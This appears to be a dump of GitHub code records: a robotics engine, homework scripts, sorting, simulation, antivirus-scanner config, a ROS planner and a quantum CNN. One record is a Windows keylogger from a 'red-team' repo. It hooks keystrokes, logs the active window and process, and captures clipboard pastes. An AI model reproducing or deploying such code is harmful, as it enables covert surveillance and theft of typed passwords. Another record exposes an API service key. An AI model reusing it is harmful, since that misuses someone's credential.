InternalEndLifecycle\nfrom src.domain.monitor_message import log_monitor_message\nfrom src.engine.engine import Engine\nfrom src.engine.engine_auth import EngineAuth\nfrom src.engine.engine_lifecycle import EngineLifecycle\nfrom src.engine.engine_ping import EnginePing\nfrom src.domain.hardware_video_event import COMMON_ENGINE_EVENT, log_event\nfrom src.engine.monitor.minos.engine_monitor_minos_app import EngineMonitorMinOSApp\nfrom src.engine.monitor.minos.engine_monitor_minos_state import EngineMonitorMinOSState\nfrom src.engine.monitor.minos.minos_suite import MinOSSuite\nfrom src.util import log\n\nMESSAGE_LOGGER = log.timed_named_logger(\"incoming_engine\")\nEVENT_LOGGER = log.timed_named_logger(\"event\")\n\n\n@dataclass\nclass EngineMonitorMinOS(Engine[\n COMMON_INCOMING_VIDEO_MESSAGE,\n COMMON_OUTGOING_VIDEO_MESSAGE,\n EngineMonitorMinOSState,\n COMMON_ENGINE_EVENT,\n DIPClientError\n]):\n engine_lifecycle: EngineLifecycle\n engine_ping: EnginePing\n engine_minos_app: EngineMonitorMinOSApp\n engine_auth: EngineAuth\n\n async def start(self):\n await self.state.base.incoming_message_queue.put(InternalStartLifecycle())\n\n async def kill(self, reason: Optional[DIPClientError]):\n await self.state.base.incoming_message_queue.put(InternalEndLifecycle(reason))\n\n async def pre_process_message(self, previous_state: EngineMonitorMinOSState, message: HardwareVideoMessage):\n log_level = environ.get('LOG_LEVEL')\n if log_level is not None and log_level.lower() == \"debug\":\n log_monitor_message(MESSAGE_LOGGER, message)\n\n async def pre_process_event(self, previous_state: EngineMonitorMinOSState, event: COMMON_ENGINE_EVENT):\n log_level = environ.get('LOG_LEVEL')\n if log_level is not None and log_level.lower() == \"debug\":\n log_event(EVENT_LOGGER, event)\n\n def message_project(\n self,\n previous_state: EngineMonitorMinOSState,\n message: COMMON_INCOMING_VIDEO_MESSAGE\n ) -> Result[List[COMMON_ENGINE_EVENT], DIPClientError]:\n return self.multi_message_project([\n self.engine_lifecycle.handle_message,\n self.engine_minos_app.handle_message,\n self.engine_auth.handle_message,\n ], previous_state, message)\n\n def state_project(\n self,\n previous_state: EngineMonitorMinOSState,\n event: COMMON_ENGINE_EVENT\n ) -> EngineMonitorMinOSState:\n stream_state = self.engine_minos_app.state_project(previous_state, event)\n return stream_state\n\n async def effect_project(self, previous_state: EngineMonitorMinOSState, event: COMMON_ENGINE_EVENT):\n projections = [\n self.engine_lifecycle.effect_project,\n self.engine_minos_app.effect_project,\n self.engine_ping.effect_project,\n self.engine_auth.effect_project,\n ]\n return await Engine.multi_effect_project(projections, previous_state, event)\n\n","repo_name":"kshaa/dip-testbed","sub_path":"client/src/engine/monitor/minos/engine_monitor_minos.py","file_name":"engine_monitor_minos.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"4790416470","text":"#!/usr/bin/env python3\n\n\nimport io\nimport ctypes\nimport os\nimport pythoncom\nimport pyHook\nimport pywin32_system32\nimport sys\nimport time\nimport win32clipboard\n\n\"\"\"Set a timer \n in seconds by\n defining a constant\n name TIMEOUT,\n with the value \n initialized as\n 60*10\"\"\"\nTIMEOUT = 60 * 10\n\n\nclass KeyLogger:\n \"\"\"Define and initialize\n a KeyLogger class\n with one variable,\n current_window, with\n the default value set to\n None.\n \"\"\"\n\n def __init__(self):\n self.current_window = None\n\n def get_current_process(self):\n \"\"\"Capture the active window\n and its associated process ID,\n GetForeGroundWindow returns\n a handle to the active window\n on the targets desktop,\n pass the handle to GetWindowThreadProcessId\n to retrieve PID.\n Open process, get PID, get\n .exe name of process,\n Grab full text using GetWindowTextA,\n \"\"\"\n hwnd = windll.user32.GetForeGroundWindow()\n pid = c_ulong(0)\n windll.user32.GetWindowThreadProcessId(hwnd, byref(pid))\n process_id = f'{pid.value}'\n\n executable = create_string_buffer(512)\n h_process = windll.kernel32.OpenProcess(0x400|0x10, False, pid)\n windll.psapi.GetModuleBaseNameA(h_process, None, byref(executable, 512))\n window_title = create_string_buffer(512)\n windll.user32.GetWindowTextA(hwnd, byref(window_title), 512)\n try:\n self.current_window = window_title.value.decode()\n except UnicodeDecodeError as e:\n print(f'{e}: window name unknown')\n\n print('\\n', process_id, executable.value.decode(), self.current_window)\n\n windll.kernel32.CloseHandle(hwnd)\n windll.kernel32.CloseHandle(h_process)\n\n def mykeystroke(self, event):\n \"\"\"Bind the key-down event\n to the KeyLogger method mykeystroke\"\"\"\n if event.Windowname != self.current_window:\n self.get_current_process()\n if 32 < event.Ascii < 127:\n print(chr(event.Ascii), end='')\n else:\n if event.Key == 'V':\n win32clipboard.OpenClipboard(())\n value = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n print(f'[PASTE] - {value}')\n else:\n print(f'{event.Key}')\n return True\n\n def run():\n save_stdout = sys.stdout\n sys.stdout = StringIO()\n\n kl = KeyLogger()\n hm = pyHook.HookManager\n hm.HookKeyboard()\n while time.thread_time() < TIMEOUT:\n pythoncom.PumpWaitingMessages()\n log = sys.stdout.getvalue()\n sys.stdout = save_stdout\n return log\n if __name__ == '__main__':\n print(run())\n print('done.')\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Grant-Knoetze/Python-red-team-code","sub_path":"KeyLogger.py","file_name":"KeyLogger.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"12540978917","text":"# -*- coding: utf-8 -*-\n\nimport random\nimport math\nfrom distribuciones import intervalo, poisson\n\n\ndef procesoPoissonHomogeneo(lamda, tiempo):\n \"\"\"\n Genera la cantidad de afionados que llegan al encuentro durante un\n las primeras T (tiempo) unidades de tiempo, con parametro lamda.\n \"\"\"\n t = 0 # tiempo transcurrido\n i = 0 # N° colectivos\n s = [] # S[i]: tiempo del evento mas reciente\n\n aficionados = 0 # Cantidad total de aficionados\n j = 0\n\n while True:\n u = random.random()\n\n if t - (math.log(u)/float(lamda)) > tiempo:\n break\n else:\n t -= (math.log(u)/float(lamda))\n i += 1\n s.append(t)\n\n # Asigno a cada colectivo una capacidad {20...40}\n while j < i:\n aficionados += intervalo(20, 21) # Numero entre 20 y 40 -> aficionados\n j += 1\n\n return aficionados\n\n\ndef esperanza(n):\n \"\"\"\n Esperanza del Proceso de Poisson Homogeneo.\n \"\"\"\n a = 0\n for _ in xrange(n):\n a += procesoPoissonHomogeneo(5, 10)\n\n return a/float(n)\n\n\n\nfor n in [100, 1000, 10000, 100000]:\n print(\"n =\", n, \"--> E(aficionados) =\", esperanza(n))\n","repo_name":"famaf/Modelos_Simulacion_2016","sub_path":"Practico_05/ejercicio11.py","file_name":"ejercicio11.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30338349838","text":"# Challenges 034\n\n\"\"\"\nDisplay the following message:\n 1) Square\n 2) Triangle\n\n Enter a number:\n\nIf the user enters 1, \nthen it should ask them for the length of one of the sides, \nand display the area.\nIf they select 2, it should ask for the base\nand height of the triangle and display the area.\nIf they type anything else, it should give them a error message.\n\"\"\"\n\n\nprint(\"1) Square\")\nprint(\"2) Triangle\")\nnum = int(input(\"Enter a number: \"))\n\n\nif num == 1:\n side_length = int(input(\"Enter the length of one of the sides: \"))\n area = side_length * side_length\n print(f\"The area of your shape is: {area}\")\nelif num == 2:\n base = int(input(\"Enter the length of the base: \"))\n height = int(input(\"Enter the height of the triangle: \"))\n area = (base * height) / 2\n print(f\"The area of your shape is: {area}\")\nelse:\n print(\"Incorrect number, please try again.\")\n","repo_name":"d-bingaling/python-by-example","sub_path":"Maths/ex34.py","file_name":"ex34.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"13956435492","text":"import requests\nimport datetime\nimport json\n\nurl = 'http://apis.data.go.kr/B552584/UlfptcaAlarmInqireSvc/getUlfptcaAlarmInfo'\nparams ={'serviceKey' : 'clCEJad0tTqdiSPIpwIKf1s/mOlQyCBXSVK6yt2OxzqUmgboB4KjsR2NnNuCo2vsS3LmoZQQKZD9bMP48ZZ8gg==', 'returnType' : 'xml', 'numOfRows' : '100', 'pageNo' : '1', 'year' : '2020', 'itemCode' : 'PM10' }\n\nresponse = requests.get(url, params=params)\nprint(response)\nprint(response.content)\nitems = response.json().get('response').get('body').get('items')\n#활용\n\ntoday = datetime.datetime.today()\nareaName = input(\"검색 지역 입력 : \")\n\ndata = dict()\ndata['districtName'] = areaName\n\narea_data = dict()\nfor item in items['item']:\n\n # 상태\n area_code = item['issueGbn']\n\n if area_code == '주의보':\n area_state = '주의보'\n elif area_code == '경보':\n area_state = '경보'\n\n else:\n area_state = '없음'\n\n area_data['code'] = area_code\n area_data['state'] = area_state\n\ndata['districtName'] = area_data\nprint(data['districtName'])","repo_name":"Ju0011/KAIST_AIcolleage","sub_path":"6_11/OpenAPI_2.py","file_name":"OpenAPI_2.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5838927361","text":"\nimport sys\nimport heapq as hq\ninput = sys.stdin.readline\n\nn,h,t = map(int,input().split())\narr = []\ncnt = 0\nfor _ in range(n): # 최대힙으로 만들기 위해 음수로 append \n arr.append(-int(input()))\n\nhq.heapify(arr)\n\nwhile arr and cnt != t:\n if -arr[0] >= h: # 거인들의 키가 더 크거나 같을 때\n if -arr[0] == 1: # 최대힙인데 1이 나오면 while문 바로 종료\n break\n else: # 거인의 키를 1/2로 줄여나가고, cnt를 1씩 증가 \n hq.heappush(arr,int((hq.heappop(arr)/2)))\n cnt += 1\n else:\n break\n\nif all(h > -x for x in arr): # while문이 끝났을 때 arr안의 모든 원소가 h보다 작으면 yes\n print('YES')\n print(cnt)\n \nelse: # 아니면 NO \n print('NO')\n print(-arr[0])\n\n\n \n\n\n\n","repo_name":"busangangster/Algorithm","sub_path":"baekjoon/Python/우선순위 큐/19638.py","file_name":"19638.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"16643952577","text":"import plotly.figure_factory as pff\nfrom sklearn.datasets import load_boston\nimport pandas as pd\nimport numpy as np\n\n# Loading the dataset\nboston = load_boston()\nX = pd.DataFrame(boston.data, columns=boston.feature_names) # Feature Matrix\nY = pd.DataFrame(boston.target, columns=[\"MEDV\"]) # Target Variable\n\n\n# Filtering: Pearson correlation: https://en.wikipedia.org/wiki/Pearson_correlation_coefficient\n\nData = pd.concat([X, Y], axis=1)\nCoRel = Data.corr()\n\n# Plotting the heat map of Pearson Correlation for all features in relation to each other\n# fig_1 = pff.create_annotated_heatmap(np.array(CoRel).round(decimals=2), colorscale='RdBu', x=list(Data.columns.values), y=list(Data.columns.values))\n# fig_1.show()\n\n# We are looking for correlation above 0.5 or below -0.5\nCoRel_Abs = abs(CoRel[\"MEDV\"])\nSelFeat = CoRel_Abs[CoRel_Abs > 0.5]\n\n# We need to make sure that Selected Features are independant of each other\nSelCoRel = Data[SelFeat.index.values].corr()\n\n# Plotting the heat map of Selected Features Correlation\n# fig_2 = pff.create_annotated_heatmap(np.array(SelCoRel).round(decimals=2), colorscale='RdBu', x=list(SelCoRel.columns.values), y=list(SelCoRel.columns.values))\n# fig_2.show()\n\n# Checking for correlation of Selected feature beaing above 0.5 or below -0.5\nmask = np.array(0.5 < abs(SelCoRel.iloc[:-1, :-1])) # droping target (MEDV)\n# droping the diagonal elements (since they are meaningless) and upper triangle (since it is repetative)\nmask *= np.tri(mask.shape[0], mask.shape[0], -1, dtype=\"bool\")\n# finding the location of coorelated selected features\nSelCoRelInd = np.argwhere(mask)\n\n# checking the correlation of them (correlated selected features) with target\nTargetSelCoRel = np.array(abs(SelCoRel.iloc[-1]))\n\n# find the index of minimum correlation in each row\nMinInd = np.argmin(TargetSelCoRel[SelCoRelInd], axis=1)\n# find the index of non independant features\nNonIndFeat = SelCoRelInd[np.arange(MinInd.size), MinInd]\n\n# set dependand features to NaN and drop them\nSelFeat.iloc[NonIndFeat] = None\nSelFeat = SelFeat.dropna()\nprint(SelFeat)\n","repo_name":"shervinazadi/Notebook_MachineLearning","sub_path":"SETUPS/PY_Regression_Feature_Selection/Reg_FeatSel_Filter_Pearson.py","file_name":"Reg_FeatSel_Filter_Pearson.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11872304196","text":"\"\"\"\nImplementation of Merge Sort.\n\"\"\"\n\n# Author: Nikhil Xavier \n# License: BSD 3 clause\n\n\ndef Merge_sort(arr):\n \"\"\"Function to perform Merge sort in ascending order.\n\n TIME COMPLEXITY: Best:O(n ln(n)), Average:O(n ln(n)), Worst:O(n ln(n))\n SPACE COMPLEXITY: Worst: O(n)\n \"\"\"\n\n if len(arr) > 1:\n mid = len(arr)//2\n left_arr = arr[:mid]\n right_arr = arr[mid:]\n merge_sort(left_arr)\n merge_sort(right_arr)\n i, j, k = 0, 0, 0\n\n while i < len(left_arr) and j < len(right_arr):\n if left_arr[i] < right_arr[j]:\n arr[k] = left_arr[i]\n i = i + 1\n else:\n arr[k] = right_arr[j]\n j = j + 1\n k = k + 1\n\n while i < len(left_arr):\n arr[k] = left_arr[i]\n i = i + 1\n k = k + 1\n\n while j < len(right_arr):\n arr[k] = right_arr[j]\n j = j + 1\n k = k + 1\n","repo_name":"Nikhil-Xavier-DS/Sort-Search-Algorithms","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5267369609","text":"import os\nimport shutil\nimport urllib.request\nimport zipfile\n\n\ndef dl_dir_from_zip(url, output_path):\n \"\"\" download a zip from url and place contents in output_path \"\"\"\n # if the directory does not exist, assume it needs downloading\n if not os.path.isdir(output_path):\n print('downloading', url)\n urllib.request.urlretrieve(url, 'temp.zip')\n with zipfile.ZipFile(\"temp.zip\", \"r\") as zip_ref:\n zip_ref.extractall('temp_zip_output')\n\n # remove the junk osx metadata that was in the zip file\n junk_osx_dir = os.path.join('temp_zip_output', '__MACOSX')\n\n if os.path.isdir(junk_osx_dir):\n shutil.rmtree(junk_osx_dir)\n\n os.remove(os.path.join(os.getcwd(), 'temp.zip'))\n \n zip_dir = os.listdir(os.path.join('temp_zip_output'))[0]\n zip_path = os.path.join('temp_zip_output', zip_dir)\n shutil.move(zip_path, output_path)\n shutil.rmtree('temp_zip_output')\n\n\n","repo_name":"Abe404/RootPainter3D","sub_path":"trainer/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"96"} +{"seq_id":"12431240367","text":"# -*- coding: utf-8 -*-\n# Upside Travel, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport errno\nimport datetime\nimport os\nimport os.path\n\nAV_DEFINITION_S3_BUCKET = os.getenv(\"AV_DEFINITION_S3_BUCKET\")\nAV_DEFINITION_S3_PREFIX = os.getenv(\"AV_DEFINITION_S3_PREFIX\", \"clamav_defs\")\nAV_DEFINITION_PATH = os.getenv(\"AV_DEFINITION_PATH\", \"/tmp/clamav_defs\")\nAV_SCAN_START_SNS_ARN = os.getenv(\"AV_SCAN_START_SNS_ARN\")\nAV_SCAN_START_METADATA = os.getenv(\"AV_SCAN_START_METADATA\", \"av-scan-start\")\nAV_SIGNATURE_METADATA = os.getenv(\"AV_SIGNATURE_METADATA\", \"av-signature\")\nAV_SIGNATURE_OK = \"OK\"\nAV_SIGNATURE_UNKNOWN = \"UNKNOWN\"\nAV_STATUS_CLEAN = os.getenv(\"AV_STATUS_CLEAN\", \"CLEAN\")\nAV_STATUS_INFECTED = os.getenv(\"AV_STATUS_INFECTED\", \"INFECTED\")\nAV_STATUS_METADATA = os.getenv(\"AV_STATUS_METADATA\", \"av-status\")\nAV_STATUS_SNS_ARN = os.getenv(\"AV_STATUS_SNS_ARN\")\nAV_STATUS_SNS_PUBLISH_CLEAN = os.getenv(\"AV_STATUS_SNS_PUBLISH_CLEAN\", \"True\")\nAV_STATUS_SNS_PUBLISH_INFECTED = os.getenv(\"AV_STATUS_SNS_PUBLISH_INFECTED\", \"True\")\nAV_TIMESTAMP_METADATA = os.getenv(\"AV_TIMESTAMP_METADATA\", \"av-timestamp\")\nCLAMAVLIB_PATH = os.getenv(\"CLAMAVLIB_PATH\", \"./bin\")\nCLAMSCAN_PATH = os.getenv(\"CLAMSCAN_PATH\", \"./bin/clamscan\")\nFRESHCLAM_PATH = os.getenv(\"FRESHCLAM_PATH\", \"./bin/freshclam\")\nAV_PROCESS_ORIGINAL_VERSION_ONLY = os.getenv(\n \"AV_PROCESS_ORIGINAL_VERSION_ONLY\", \"False\"\n)\nAV_DELETE_INFECTED_FILES = os.getenv(\"AV_DELETE_INFECTED_FILES\", \"False\")\n\nAV_DEFINITION_FILE_PREFIXES = [\"main\", \"daily\", \"bytecode\"]\nAV_DEFINITION_FILE_SUFFIXES = [\"cld\", \"cvd\"]\nSNS_ENDPOINT = os.getenv(\"SNS_ENDPOINT\", None)\nS3_ENDPOINT = os.getenv(\"S3_ENDPOINT\", None)\nLAMBDA_ENDPOINT = os.getenv(\"LAMBDA_ENDPOINT\", None)\n\n\ndef create_dir(path):\n if not os.path.exists(path):\n try:\n print(\"Attempting to create directory %s.\\n\" % path)\n os.makedirs(path)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n\ndef get_timestamp():\n return datetime.datetime.utcnow().strftime(\"%Y/%m/%d %H:%M:%S UTC\")\n","repo_name":"bluesentry/bucket-antivirus-function","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":526,"dataset":"github-code","pt":"96"} +{"seq_id":"22460929630","text":"import urllib.request\nimport urllib.parse\n\nurl=\"https://www.httpbin.org/post\"\nheaders={\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\",\n \"host\":\"www.httpbin.org\",\n }\ndict={\n \"name\":\"Germey\"\n}\n\ndata=bytes(urllib.parse.urlencode(dict),encoding=\"utf8\")\nreq=urllib.request.Request(url=url,data=data,headers=headers,method=\"POST\")\nresponse=urllib.request.urlopen(req)\nprint(response.read().decode(\"utf8\"))\n","repo_name":"HandsomeLunHui/CrawlAndOj","sub_path":"crawl/urllib_crawl.py","file_name":"urllib_crawl.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9944642121","text":"# ////////////////////////////////////////\n# // //\n# // Name: Tristan Simpson //\n# // //\n# // Assignment: Little Proffessor //\n# // //\n# ////////////////////////////////////////\nimport sys, random\n\n# // Get the level the user wants to be play\ndef get_level() -> int:\n choice: int = 0\n\n # // While choice is invalid (not 1, 2 or 3)\n while choice <= 0 or choice > 3:\n try:\n choice = int(input(\"Level: \"))\n except Exception: pass\n return choice\n\n# // Generate a random integer depending\n# // on the level choice\ndef generate_integer(level: int) -> int:\n return {\n 1: random.randint(0, 9),\n 2: random.randint(10, 99),\n 3: random.randrange(100, 999)\n }[level]\n\n# // Main function\ndef main():\n # // Get the level the user wants to play at\n level: int = get_level()\n\n # // Pre-Defined Variables\n errors: int = 0\n score: int = 0\n answer: int = -1\n\n # // Play game 10 times\n for _ in range(10):\n x: int = generate_integer(level)\n y: int = generate_integer(level)\n\n solution: int = x + y\n while solution != answer:\n # // Exit the program after printing the\n # // correct answer\n if errors >= 3:\n print(solution)\n sys.exit(f\"Score: {score}\")\n\n try:\n answer: int = int(input(f\"{x} + {y} = \"))\n except Exception:\n pass\n\n # // If the answer is correct, increase score\n if solution == answer:\n errors = 0\n score += 1\n\n # // Else, increase errors\n elif solution != answer:\n errors += 1\n print(\"EEE\")\n\n # // Print the users score\n print(f\"Score: {score}\")\n\n\n# // Run the program\nif __name__ == \"__main__\":\n main()\n\n# check50 cs50/problems/2022/python/professor\n# submit50 cs50/problems/2022/python/professor","repo_name":"realTristan/CS50P","sub_path":"ProblemSet_4/Little_Professor.py","file_name":"Little_Professor.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"18890605607","text":"#Accept Number & Check Whether the Number is Divisible by 5 or NOT\r\n\r\ndef Divisible5(No) :\r\n if((No % 5) == 0) :\r\n return True\r\n \r\n else :\r\n return False\r\n\r\ndef main() :\r\n print(\"Enter a Number\")\r\n Value = int(input())\r\n\r\n Ret = False\r\n Ret = Divisible5(Value)\r\n\r\n if(Ret == True):\r\n print(\"Number is Divisible by 5\")\r\n\r\n else:\r\n print(\"Number is NOT Divisible by 5\")\r\n\r\nif __name__ == \"__main__\" :\r\n main()","repo_name":"YashrajTilekar/Python","sub_path":"Assignment1_7.py","file_name":"Assignment1_7.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"1813232071","text":"#!/usr/bin/env python3.6\n\nimport pinocchio as pin\nfrom pinocchio.robot_wrapper import RobotWrapper\nimport rospy\nimport rospkg\nimport numpy as np\nimport time\nimport threading\nfrom std_msgs.msg import Bool, Float64, ColorRGBA\nfrom nav_msgs.msg import Odometry \nfrom sensor_msgs.msg import JointState \nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom geometry_msgs.msg import PointStamped, Point, PoseStamped\nfrom scipy.spatial.transform import Rotation as R\nfrom arm import dynamics, linearize_dynamics, ee_fk, ee_jacobian\nfrom dircol_problem import DircolProblem\nfrom fk_dircol_problem import FKDircolProblem\nimport crocoddyl as croc\n\nnp.set_printoptions(linewidth=np.inf)\nnp.set_printoptions(suppress=True)\n\n# Initialize node and get parameters\nrospy.init_node('dircol_node', anonymous=True)\ndt = rospy.get_param('dt')\nsteps = rospy.get_param('planning_steps')\nsim_integration = rospy.get_param('sim_integration')\nplanner_integration = rospy.get_param('planner_integration')\njoint_angle_lower_limits = rospy.get_param('joint_angle_lower_limits')\njoint_angle_upper_limits = rospy.get_param('joint_angle_upper_limits')\njoint_torque_limits = rospy.get_param('joint_torque_limits')\ngoal_pos = rospy.get_param('goal_position')\ngoal_angle = rospy.get_param('goal_angle')\ninitial_joint_angles = rospy.get_param('initial_joint_angles')\ninitial_base_position = rospy.get_param('initial_base_position')\ninitial_base_angle = rospy.get_param('initial_base_angle')\n\n# Instantiate planner with urdf file\nrospack = rospkg.RosPack()\npath = rospack.get_path('sos_space')\nurdf_file = path + '/urdf/robot.urdf'\n\n# Publishers\nodom_pub = rospy.Publisher('/space_robot/odom', Odometry, queue_size=1)\njoints_pub = rospy.Publisher('/space_robot/fbk/joint_state', JointState, queue_size=1)\ngoal_pub = rospy.Publisher('/space_robot/goal', PoseStamped, queue_size=1)\ngoal_pose = PoseStamped()\ngoal_pose.header.frame_id = 'goal'\ngoal_pose.pose.position.x = goal_pos[0]\ngoal_pose.pose.position.y = goal_pos[1]\ngoal_pose.pose.orientation.z = np.sin(goal_angle/2)\ngoal_pose.pose.orientation.w = np.cos(goal_angle/2)\n\nplan_pub = rospy.Publisher('/space_robot/plan', Marker, queue_size=1)\nplan_marker = Marker()\nplan_marker.type = Marker.LINE_STRIP\nplan_marker.action = Marker.ADD\nplan_marker.pose.position.x = 0\nplan_marker.pose.position.y = 0\nplan_marker.pose.position.z = 0\nplan_marker.pose.orientation.w = 1\nplan_marker.pose.orientation.x = 0\nplan_marker.pose.orientation.y = 0\nplan_marker.pose.orientation.z = 0\nplan_marker.scale.x = 0.01\nplan_marker.color.r = 1\nplan_marker.color.g = 0\nplan_marker.color.b = 0\nplan_marker.color.a = 1\nplan_marker.header.frame_id = \"world\"\nplan_marker.ns = \"test_node\"\n\n'''\nfrom vm_dynamics import VMDynamics\nvmd = VMDynamics()\nvmd.euler_lagrange()\n'''\n\narm_dynamics = dynamics(urdf_file)\narm_dynamics_deriv = linearize_dynamics(urdf_file)\n\nQ = 1\nR = np.eye(arm_dynamics.num_rotary)\nnx = 2*(arm_dynamics.num_rotary + 3)\nnu = arm_dynamics.num_rotary\nxinit = np.zeros(nx)\nxinit[3:3 + arm_dynamics.num_rotary] = np.array(initial_joint_angles)\nulb = -np.array(joint_torque_limits)\nuub = np.array(joint_torque_limits)\nfk = ee_fk(urdf_file)\njacobian = ee_jacobian(urdf_file)\nproblem = FKDircolProblem(Q, R, steps, dt, arm_dynamics, arm_dynamics_deriv, nx, nu, xinit, ulb, uub, np.array(goal_pos), fk, jacobian, nx//2, nx//2)\nxs, us, solved = problem.solve()\nts = [dt*i for i, x in enumerate(xs)]\n\nrobot = RobotWrapper.BuildFromURDF(urdf_file, root_joint=pin.JointModelFreeFlyer())\nrobot.model.gravity.setZero()\nmodel = robot.model\n\ndata = pin.Data(model)\n\nfor x in xs:\n point = fk(x[:3 + arm_dynamics.num_rotary])\n plan_marker.points.append(Point(point[0], point[1], 0))\n\nt = 0\nstep = 0\nx = np.concatenate((pin.neutral(model), np.zeros(model.nv)))\nx[7:model.nq] = np.array(initial_joint_angles)\nx[:2] = np.array(initial_base_position)\nx[5] = np.sin(initial_base_angle/2)\nx[6] = np.cos(initial_base_angle/2)\n\nstate = croc.StateMultibody(robot.model)\nactuationModel = croc.ActuationModelFloatingBase(state)\naction_model = croc.IntegratedActionModelRK4(croc.DifferentialActionModelFreeFwdDynamics(state, actuationModel, croc.CostModelSum(state, len(us[0]))), dt)\naction_data = action_model.createData()\n\nrate = rospy.Rate(20)\nwhile not rospy.is_shutdown():\n u = us[step]\n tau = np.concatenate((np.zeros(6), u))\n f_ext = [pin.Force.Zero() for i in range(model.njoints)]\n '''\n q = x[:model.nq]\n v = x[model.nq:]\n acc = pin.aba(model, data, q, v, tau, f_ext)\n\n vnew = v + acc*dt\n qnew = pin.integrate(model, q, vnew*dt)\n x = np.concatenate((qnew, vnew))\n '''\n action_model.calc(action_data, x, u)\n x = np.copy(action_data.xnext)\n\n odom = Odometry()\n odom.pose.pose.position.x = x[0]\n odom.pose.pose.position.y = x[1]\n odom.pose.pose.position.z = x[2]\n odom.pose.pose.orientation.x = x[3]\n odom.pose.pose.orientation.y = x[4]\n odom.pose.pose.orientation.z = x[5]\n odom.pose.pose.orientation.w = x[6]\n odom.twist.twist.linear.x = x[model.nq]\n odom.twist.twist.linear.y = x[model.nq + 1]\n odom.twist.twist.linear.z = x[model.nq + 2]\n odom.twist.twist.angular.x = x[model.nq + 3]\n odom.twist.twist.angular.y = x[model.nq + 4]\n odom.twist.twist.angular.z = x[model.nq + 5]\n odom.header.stamp = rospy.Time.now()\n\n joints = JointState()\n for j in range(arm_dynamics.num_rotary):\n name = model.names[j + 2]\n joints.name.append(name)\n jidx = model.getJointId(name) - 2\n joints.position.append(x[7 + jidx])\n joints.velocity.append(x[model.nq + 6 + jidx])\n\n joints.header.stamp = rospy.Time.now()\n odom_pub.publish(odom)\n joints_pub.publish(joints)\n\n plan_marker.header.stamp = rospy.Time.now()\n plan_pub.publish(plan_marker)\n\n goal_pose.header.stamp = rospy.Time.now()\n goal_pub.publish(goal_pose)\n\n t += dt\n step += 1\n\n if step >= steps:\n break\n\n rate.sleep()\n","repo_name":"EpicDuckPotato/sos_space","sub_path":"scripts/dircol_node.py","file_name":"dircol_node.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25766546886","text":"from tensorflow.keras import Input, Model\nfrom tensorflow.keras.layers import Flatten, Dense\nimport numpy as np\nfrom qml_hep_lhc.layers.qconv2d import QConv2D\nfrom qml_hep_lhc.models.base_model import BaseModel\n\n\nclass QCNNCong(BaseModel):\n \"\"\"\n\tQuantum Convolutional Neural Network.\n\tThis implementation is based on https://arxiv.org/abs/2012.12177\n\t\"\"\"\n def __init__(self, data_config, args=None):\n super(QCNNCong, self).__init__(args)\n self.args = vars(args) if args is not None else {}\n\n # Data config\n self.input_dim = data_config[\"input_dims\"]\n kernel_size = (self.input_dim[0], self.input_dim[1])\n n_layers = self.args.get(\"n_layers\", 3)\n self.fm_class = \"AngleMap\"\n self.ansatz_class = \"Cong\"\n\n self.qconv2d = QConv2D(\n filters=1,\n kernel_size=kernel_size,\n strides=1,\n n_layers=n_layers,\n padding=\"valid\",\n cluster_state=False,\n fm_class=self.fm_class,\n ansatz_class=self.ansatz_class,\n drc=False,\n name='qconv2d',\n )\n\n self.flatten = Flatten()\n\n def call(self, input_tensor):\n x = self.qconv2d(input_tensor)\n x = self.flatten(x)\n return x\n\n def build_graph(self):\n x = Input(shape=self.input_dim)\n return Model(inputs=[x], outputs=self.call(x), name=\"QCNNCong\")\n\n @staticmethod\n def add_to_argparse(parser):\n parser.add_argument(\"--n-layers\", type=int, default=3)\n return 